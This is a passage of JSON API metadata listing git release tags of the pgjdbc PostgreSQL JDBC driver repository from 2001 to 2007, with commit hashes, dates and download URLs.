_2_506","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_506/manifests"},{"name":"REL8_2_505","sha":"91879290313ab6f64e05f9f366c368dc8419516c","kind":"commit","published_at":"2007-04-18T08:15:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_505","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_505","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_505","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_505/manifests"},{"name":"REL8_1_409","sha":"ef22d89fe798811a7ac7a143b0620043eb0acd00","kind":"commit","published_at":"2007-04-18T08:14:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_409","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_409","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_409","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_409/manifests"},{"name":"REL8_0_319","sha":"859fe40b52d5e8c44184c19015bd1836478c7355","kind":"commit","published_at":"2007-04-18T08:13:26.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_319","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_319","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_319","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_319/manifests"},{"name":"REL8_2_504","sha":"80b0ce1be968813de3d56ff1670857015ce6862f","kind":"commit","published_at":"2006-12-01T12:02:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_2_504","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_2_504","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_2_504","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_2_504/manifests"},{"name":"REL8_1_408","sha":"db52e0e583a7b8af7c7d5da34f50c8f965baec6f","kind":"commit","published_at":"2006-12-01T11:57:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_408","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_408","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_408","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_408/manifests"},{"name":"REL8_0_318","sha":"50466b1014fd76ec445abe26b234c13dc7c0f338","kind":"commit","published_at":"2006-12-01T11:54:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_318","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_318","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_318","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_318/manifests"},{"name":"REL8_0_317","sha":"7bab436cbec9baec3cd36c6d320cdc4402fd718c","kind":"commit","published_at":"2006-05-23T23:07:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_317","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_317","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_317","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_317/manifests"},{"name":"REL8_1_407","sha":"d9e844e0f120b4401e178392c6d4293ac5e7d3cd","kind":"commit","published_at":"2006-05-23T23:07:09.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_407","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_407","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_407","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_407/manifests"},{"name":"REL8_0_316","sha":"027669dc50a5266603367853ba6a5a9e5fba91bd","kind":"commit","published_at":"2006-05-22T10:08:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_316","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_316","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_316","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_316/manifests"},{"name":"REL8_1_406","sha":"6b082944901866105f620900867a0e7eb8b96d91","kind":"commit","published_at":"2006-05-22T10:08:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_406","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_406","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_406","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_406/manifests"},{"name":"REL8_1_405","sha":"5dbd05a49a9c17f00528d7c8d885cfdeaacf3ad9","kind":"commit","published_at":"2006-02-09T17:04:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_405","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_405","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_405","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_405/manifests"},{"name":"REL8_0_315","sha":"90ed05f956d7269066a591086d9431191affa7bb","kind":"commit","published_at":"2006-02-09T17:04:06.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_315","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_315","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_315","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_315/manifests"},{"name":"REL8_1_404","sha":"d3f28b54df40c3eae08305d51d0219c689de4797","kind":"commit","published_at":"2005-11-06T06:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_1_404","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_1_404","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_1_404","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_1_404/manifests"},{"name":"REL8_0_314","sha":"5f21e4fa065eeb8719ff8f0ce593c9337f9d0335","kind":"commit","published_at":"2005-11-06T06:41:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_314","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_314","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_314","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_314/manifests"},{"name":"REL8_0_313","sha":"9cac940139c5c0f95a18199600309ed276daf0d5","kind":"commit","published_at":"2005-10-07T06:08:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_313","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_313","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_313","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_313/manifests"},{"name":"REL8_0_312","sha":"3ae53db8d3ca58443540e6e371e14027d3d85a0b","kind":"commit","published_at":"2005-07-24T11:05:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_312","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_312","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_312","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_312/manifests"},{"name":"REL8_0_311","sha":"ac526695a77433ceea00e1f8b4a9ba710607d2f2","kind":"commit","published_at":"2005-04-11T04:45:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_311","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_311","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_311","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_311/manifests"},{"name":"REL8_0_310","sha":"29a41dac2a3025af1d759924fcbd688cd9c8ee25","kind":"commit","published_at":"2005-02-02T20:08:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_310","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_310","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_310","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_310/manifests"},{"name":"REL8_0_309","sha":"389b1a118b97418bd72ef30e4e6534d5987faa60","kind":"commit","published_at":"2005-01-17T11:09:41.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL8_0_309","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL8_0_309","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL8_0_309","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL8_0_309/manifests"},{"name":"REL7_4_1","sha":"2d3f36805608aa2a41d3fc85c7bc0c1e43dfb0b3","kind":"commit","published_at":"2003-12-18T04:18:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_1/manifests"},{"name":"REL7_4","sha":"76a1ece07b1d3f4110d6522ce7eaf9c382316125","kind":"commit","published_at":"2003-11-15T10:20:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4/manifests"},{"name":"REL7_4_RC2","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC2/manifests"},{"name":"REL7_4_RC1","sha":"00f63c8f0632ef0539d0cf0e6ac1f7ad00d28574","kind":"commit","published_at":"2003-10-30T12:18:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_RC1/manifests"},{"name":"REL7_4_BETA5","sha":"8115d542320a2c6cccb5e28640991b3bd6107ad6","kind":"commit","published_at":"2003-10-15T09:39:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA5/manifests"},{"name":"REL7_4_BETA4","sha":"67fffc6579b15aadb6567cdad3d7b07360f37912","kind":"commit","published_at":"2003-09-23T06:13:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA4/manifests"},{"name":"REL7_4_BETA3","sha":"3f65d0b145f09a2f9ed09f53500f63efde8eb3f4","kind":"commit","published_at":"2003-09-13T04:02:16.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA3/manifests"},{"name":"REL7_4_BETA2","sha":"7d4ef49d60406717eab1291c0cf6af65464e13bf","kind":"commit","published_at":"2003-08-26T06:50:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA2/manifests"},{"name":"REL7_3_5","sha":"b7556b365129f5076b40e8721a0b0318d4fb5ac3","kind":"commit","published_at":"2003-08-07T17:56:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_5/manifests"},{"name":"REL7_4_BETA1","sha":"ad2546260b21f17f5ad096010f1a80790108f3cd","kind":"commit","published_at":"2003-07-24T00:30:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_4_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_4_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_4_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_4_BETA1/manifests"},{"name":"REL7_3_4","sha":"433b7b97da262eb863e59b29161f9691a7e624c8","kind":"commit","published_at":"2003-07-23T23:34:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_4/manifests"},{"name":"REL7_3_2","sha":"93d0ed7240e64ecfaaeb7e689594dc878125fd36","kind":"commit","published_at":"2003-01-14T09:40:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_3_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_3_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_3_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_3_2/manifests"},{"name":"REL7_2_4","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_4/manifests"},{"name":"REL7_2_3","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_3/manifests"},{"name":"REL7_2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2/manifests"},{"name":"REL7_2_RC2","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC2/manifests"},{"name":"REL7_2_RC1","sha":"f4cfb708fe309ef501e76713bc447f878c1dff79","kind":"commit","published_at":"2002-01-18T17:21:51.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_RC1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_RC1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_RC1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_RC1/manifests"},{"name":"REL7_2_BETA5","sha":"74b58ea9308a8d0afa06c4da53967eccbe10f955","kind":"commit","published_at":"2002-01-05T22:26:23.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA5/manifests"},{"name":"REL7_2_BETA4","sha":"7b96aee64942e2b041820d2c8a6a95c8ac79dfdb","kind":"commit","published_at":"2001-12-11T04:48:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA4/manifests"},{"name":"REL7_2_BETA3","sha":"855287de30b689e315b435f79f3b8fd066dd5ac8","kind":"commit","published_at":"2001-11-19T23:19:21.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA3/manifests"},{"name":"REL7_2_BETA2","sha":"42c01a77e1e0be5f5b2d631fef5b3d46c2dbb7c2","kind":"commit","published_at":"2001-11-02T23:51:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA2/manifests"},{"name":"REL7_2_BETA1","sha":"72a1e406d24746a658be7672b311a73bb3d815a3","kind":"commit","published_at":"2001-10-25T06:00:05.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_2_BETA1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_2_BETA1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_2_BETA1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_2_BETA1/manifests"},{"name":"REL7_1_2","sha":"78eb5549506b35d6bd13b915f34c49ec604f1f7c","kind":"commit","published_at":"2001-05-12T20:45:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL7_1_2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL7_1_2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL7_1_2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL7_1_2/manifests"},{"name":"RE